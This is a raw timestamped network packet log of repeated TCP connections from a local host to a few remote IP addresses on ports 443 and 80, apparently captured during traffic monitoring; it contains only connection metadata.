Oct 3, 2024 02:53:26.278937101 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.278938055 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.279038906 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.548486948 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.548573017 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.548639059 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.548715115 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.548715115 CEST	49777	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.548757076 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.548788071 CEST	443	49777	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.556162119 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.556265116 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:26.556555986 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.556555986 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:26.556643009 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.147161961 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.147258997 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.148171902 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.148200035 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.148535967 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.149143934 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.149184942 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.149276972 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.429646969 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.429805040 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.429838896 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.429922104 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.429960966 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.429960966 CEST	49778	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.429982901 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.430001974 CEST	443	49778	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.433638096 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.433720112 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:27.433806896 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.434005022 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:27.434021950 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.050192118 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.050374031 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.114547014 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.114608049 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.115448952 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.116441011 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.117304087 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.117314100 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.411963940 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.412128925 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.412261963 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.413603067 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.413647890 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.413676023 CEST	49779	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.413691998 CEST	443	49779	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.455360889 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.455470085 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:28.455583096 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.455929995 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:28.455965996 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.100337982 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.100419044 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.101457119 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.101478100 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.102258921 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.104891062 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.104928970 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.105015993 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.382349968 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.382498026 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.382519960 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.382524967 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.382575035 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.382580996 CEST	49780	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.382612944 CEST	443	49780	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.391607046 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.391637087 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.391700983 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.391899109 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.391912937 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.984452009 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.984524012 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.985548973 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.985558987 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.985896111 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:29.986660957 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.986685038 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:29.986690998 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.255244017 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.255304098 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.255359888 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.255367994 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.299928904 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.299947023 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.341264009 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.341326952 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.341336012 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.350770950 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.350790977 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.350853920 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.350862026 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.350899935 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.384969950 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.384989977 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.385018110 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.385032892 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.385051012 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.410059929 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.410080910 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.410118103 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.410125017 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.410145044 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.410172939 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.410181046 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.410187006 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.410238028 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.410260916 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.428170919 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.428194046 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.428252935 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.428261042 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.428287983 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.437634945 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.437654972 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.437695980 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.437702894 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.437727928 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.442404032 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.442467928 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.442476034 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.442517042 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.442564964 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.442576885 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.442621946 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.442626953 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.457415104 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.457477093 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.457483053 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.462109089 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.462162018 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.462171078 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.462254047 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.462305069 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.462366104 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.462376118 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:30.462398052 CEST	49781	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:30.462403059 CEST	443	49781	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.041400909 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.041431904 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.041484118 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.041862965 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.041881084 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.631783009 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.631872892 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.632822037 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.632832050 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.633160114 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.633796930 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.633841038 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.633846998 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.913270950 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.913358927 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.913589954 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.913700104 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.913707972 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.913728952 CEST	49782	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.913733006 CEST	443	49782	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.918545961 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.918668032 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:31.918742895 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.919015884 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:31.919049978 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.523475885 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.523545027 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.524627924 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.524656057 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.524872065 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.525724888 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.525760889 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.525770903 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.807671070 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.807763100 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.807811022 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.807878971 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.807905912 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.807923079 CEST	49783	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.807933092 CEST	443	49783	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.825423956 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.825445890 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:32.825546026 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.825756073 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:32.825768948 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.444457054 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.444572926 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.454612970 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.454631090 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.455128908 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.464132071 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.464452982 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.464458942 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.727922916 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.728070974 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.728077888 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.728099108 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.728137016 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:33.728157043 CEST	49784	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:33.728171110 CEST	443	49784	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.245877981 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.245978117 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.246112108 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.250405073 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.250438929 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.866208076 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.866281033 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.867599964 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.867609024 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.867947102 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:37.931840897 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.931904078 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:37.931956053 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:38.299240112 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:38.299464941 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:38.299539089 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:38.308331013 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:38.308370113 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:53:38.308397055 CEST	49785	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:53:38.308412075 CEST	443	49785	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:07.896344900 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:07.901741028 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:07.901865959 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:07.901981115 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:07.902046919 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:07.907088995 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:07.907171965 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:09.019166946 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:09.019256115 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:09.019445896 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:09.019547939 CEST	49786	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:09.024524927 CEST	80	49786	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:14.670248985 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:14.677112103 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:14.677194118 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:14.677408934 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:14.677423954 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:14.682373047 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:14.682403088 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:15.772309065 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:15.778348923 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:15.778409004 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:15.778502941 CEST	49787	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:15.783427954 CEST	80	49787	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:23.074740887 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:23.079809904 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:23.080022097 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:23.080152035 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:23.080184937 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:23.085079908 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:23.085108995 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:24.173683882 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:24.178646088 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:24.178713083 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:24.178752899 CEST	49788	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:24.183702946 CEST	80	49788	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:30.636445045 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:30.642077923 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:30.642164946 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:30.642303944 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:30.642373085 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:30.647489071 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:30.647531033 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:31.822818995 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:31.831110001 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:31.831285000 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:31.831285000 CEST	49789	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:31.836261034 CEST	80	49789	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:40.340740919 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:40.345947981 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:40.346025944 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:40.346215963 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:40.346232891 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:40.351094007 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:40.351198912 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:41.494410038 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:41.494504929 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:41.494534969 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:41.494606972 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:41.494607925 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:41.494780064 CEST	49790	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:54:41.499623060 CEST	80	49790	190.219.117.240	192.168.2.4
Oct 3, 2024 02:54:52.854710102 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:52.854805946 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:52.854897022 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:52.855295897 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:52.855381012 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.493346930 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.493561029 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.494704008 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.494760990 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.495114088 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.531335115 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.531335115 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.531548023 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.771467924 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.771548986 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.771742105 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.771897078 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.771944046 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:53.771981001 CEST	49791	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:54:53.771996975 CEST	443	49791	23.145.40.162	192.168.2.4
Oct 3, 2024 02:54:55.344008923 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:55.349196911 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:54:55.349271059 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:55.349387884 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:55.349399090 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:55.354331017 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:54:55.354370117 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:54:56.653625011 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:54:56.654210091 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:54:56.654274940 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:56.654320955 CEST	49792	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:54:56.659790993 CEST	80	49792	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:09.034935951 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.035032988 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.035165071 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.035455942 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.035490990 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.644175053 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.644258976 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.645886898 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.645915985 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.646188021 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.646919966 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.646959066 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.646995068 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.932590008 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.932645082 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.932817936 CEST	49793	443	192.168.2.4	23.145.40.162
